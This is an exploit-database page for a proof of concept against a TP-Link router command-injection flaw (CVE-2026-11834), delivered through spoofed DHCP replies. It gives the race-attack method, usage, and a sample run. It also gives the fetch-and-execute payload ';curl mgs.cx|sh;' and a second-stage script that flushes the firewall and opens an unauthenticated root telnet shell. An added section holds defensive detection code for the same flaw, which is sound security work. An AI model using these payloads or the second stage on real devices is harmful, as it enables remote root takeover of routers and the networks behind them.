## https://sploitus.com/exploit?id=F3832E4F-76F3-50B7-92A3-92EB0B582EB1
# CVE-2026-11834 (PoC)
TP-Link DHCP Option 66 Unauthenticated RCE (CVE-2026-11834)
## Overview
A command injection vulnerability (CWE-78) in the DHCP Option 66 ("TFTP Server Name") handling of TP-Link router firmware allows an unauthenticated attacker on the same network segment to execute arbitrary commands as root. When the device acts as a DHCP client on its WAN interface, the Option 66 value returned in a lease is concatenated unsanitised into a `tftp` shell command within `libcmm.so`. Five functions build this command and pass it to `util_execSystem()`, which calls `system()`, so a crafted Option 66 value is interpreted as shell input and executed as root.
The Option 66 value is truncated to 16 characters on the device, so the payload is a minimal fetch-and-execute (`;curl |sh;`) that pulls a larger second stage over HTTP.
The attacker does not need to control the DHCP server. This PoC races the legitimate server on the segment: it spoofs a DHCP `RELEASE` as the target to clear its binding, waits for the target to re-acquire its lease, then answers the target's broadcast with a malicious `OFFER`/`ACK` carrying the payload before the legitimate server replies.
This Proof of Concept (PoC) was tested against the TP-Link Archer C20 V6 (firmware 0.9.1 Build 4.19, EU). The vulnerable code path is shared across a range of TP-Link routers; memory offsets, function addresses, and behaviour may differ on other models or firmware versions.
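The detection side of the bug described above, as an added example that is not part of this PoC or of TP-Link's code: a minimal DHCP option parser plus a check that classifies an `OFFER`/`ACK` whose Option 66 value is not a syntactically valid TFTP server name (RFC 1123 hostname or dotted IPv4). The same validation is what the firmware should apply before the value ever reaches a shell command. Function names (`parse_dhcp_options`, `check_option66`, `build_ack`) and the constructed test packets are assumptions made here; the `;curl mgs.cx|sh;` sample is the payload shown elsewhere on this page.

```python
import re

DHCP_MAGIC = b"\x63\x82\x53\x63"
OPT_PAD, OPT_END, OPT_MSG_TYPE, OPT_TFTP_SERVER = 0, 255, 53, 66
DHCP_OFFER, DHCP_ACK = 2, 5

# RFC 1123 label: alphanumerics and hyphens, no leading/trailing hyphen, max 63 chars.
# Shell metacharacters (; | & $ ` space ...) can never match this.
_LABEL = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def parse_dhcp_options(payload):
    """Return {code: value} for the TLV options in a raw BOOTP/DHCP payload."""
    if len(payload) < 240 or payload[236:240] != DHCP_MAGIC:
        raise ValueError("not a DHCP payload")
    opts = {}
    i = 240  # options start right after the 236-byte fixed header + magic cookie
    while i < len(payload):
        code = payload[i]
        if code == OPT_END:
            break
        if code == OPT_PAD:
            i += 1
            continue
        if i + 1 >= len(payload):
            raise ValueError("truncated option header")
        length = payload[i + 1]
        value = payload[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated option value")
        opts[code] = value
        i += 2 + length
    return opts


def is_valid_tftp_server_name(name):
    """True only for a dotted IPv4 address or an RFC 1123 hostname."""
    if not name or len(name) > 253:
        return False
    labels = name.split(".")
    if len(labels) == 4 and all(lbl.isdigit() for lbl in labels):
        return all(0 <= int(lbl) <= 255 for lbl in labels)
    return all(_LABEL.match(lbl) for lbl in labels)


def check_option66(payload):
    """Classify a server reply: ("ignore"|"ok"|"suspicious", decoded Option 66 or None)."""
    opts = parse_dhcp_options(payload)
    if opts.get(OPT_MSG_TYPE) not in (bytes([DHCP_OFFER]), bytes([DHCP_ACK])):
        return "ignore", None
    raw = opts.get(OPT_TFTP_SERVER)
    if raw is None:
        return "ok", None
    # Option 66 is a NUL-padded ASCII string; anything non-ASCII is already a red flag.
    name = raw.rstrip(b"\x00").decode("ascii", errors="replace")
    if is_valid_tftp_server_name(name):
        return "ok", name
    return "suspicious", name


def build_ack(option66):
    """Constructed test input: a minimal DHCP ACK, optionally carrying Option 66."""
    header = bytes([2, 1, 6, 0]) + b"\x00" * 232  # op=BOOTREPLY, htype=1, hlen=6, rest zeroed
    options = bytes([OPT_MSG_TYPE, 1, DHCP_ACK])
    if option66 is not None:
        options += bytes([OPT_TFTP_SERVER, len(option66)]) + option66
    return header + DHCP_MAGIC + options + bytes([OPT_END])


if __name__ == "__main__":
    for sample in (b"tftp.example.net", b"10.0.10.5", b";curl mgs.cx|sh;"):
        print(sample.decode(), "->", check_option66(build_ack(sample)))
```

`check_option66` takes the UDP payload of a DHCP server reply, so it can be fed from a packet capture or a sniffer on the WAN-side segment; any `suspicious` verdict on an `OFFER`/`ACK` addressed to a router is worth alerting on, since a legitimate TFTP server name never contains shell metacharacters. The 16-character truncation noted above does not affect the check, because the injected metacharacters sit at the start of the value.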
## Warning
This PoC delivers an Option 66 payload that is executed as root on the target device. The example second stage drops the device firewall and starts a telnet listener. Only run this against hardware you own or are explicitly authorised to test.
## Usage
```bash
$ sudo python3 cve-2026-11834.py <target_ip> -i <interface> -s <server_ip> -S <server_mac> -p '<payload>'
```
| Argument | Description |
| --------------------- | -------------------------------------------------------------------------- |
| `target_ip` | Current IP address of the target device |
| `-i`, `--interface` | Network interface on the target's segment |
| `-s`, `--server-ip` | Legitimate DHCP server IP |
| `-S`, `--server-mac` | Legitimate DHCP server MAC |
| `-p`, `--payload` | Option 66 value (fetch-and-execute string, e.g. `;curl mgs.cx\|sh;`) |
| `-t`, `--target-mac` | Target MAC (auto-resolved via ARP if omitted) |
| `-a`, `--attacker-ip` | Server-id advertised in the malicious lease (defaults to the interface IP) |
Example run:
```bash
$ sudo python3 cve-2026-11834.py 10.0.10.110 -i eth0 -s 10.0.10.254 -S 00:f2:8b:99:86:46 -p ';curl mgs.cx|sh;'
TP-Link DHCP Option 66 Unauthenticated RCE (CVE-2026-11834) - Race Attack
Target IP : 10.0.10.110
Target MAC : 3c:64:cf:7b:69:8b
DHCP Server : 10.0.10.254 (00:f2:8b:99:86:46)
Attacker IP : 10.0.10.5
Interface : eth0
Payload : ;curl mgs.cx|sh;
[*] Sending spoofed DHCP RELEASE for 10.0.10.110
[*] RELEASE sent. Waiting for target to re-acquire lease...
[!] Got DHCP REQUEST from 3c:64:cf:7b:69:8b, XID: 0x43edad72
[>] Sending malicious DHCP ACK...
[>] ACK sent. Payload delivered.
```
The payload host serves a second stage that the device fetches and runs. For example:
```bash
$ cat index.html
echo "[*] Execution"
iptables -F
iptables -P INPUT ACCEPT
echo "[*] Firewall rules dropped"
telnetd -l /bin/sh -p 2323 -b 0.0.0.0
echo "[*] Telnetd started on port 2323"
$ sudo python3 -m http.server 80
```
## Links
- Full Writeup: https://mattg.systems/posts/cve-2026-11834/
- CVE Record: https://www.cve.org/cverecord?id=CVE-2026-11834
- TP-Link Security Advisory: https://www.tp-link.com/uk/support/faq/5141/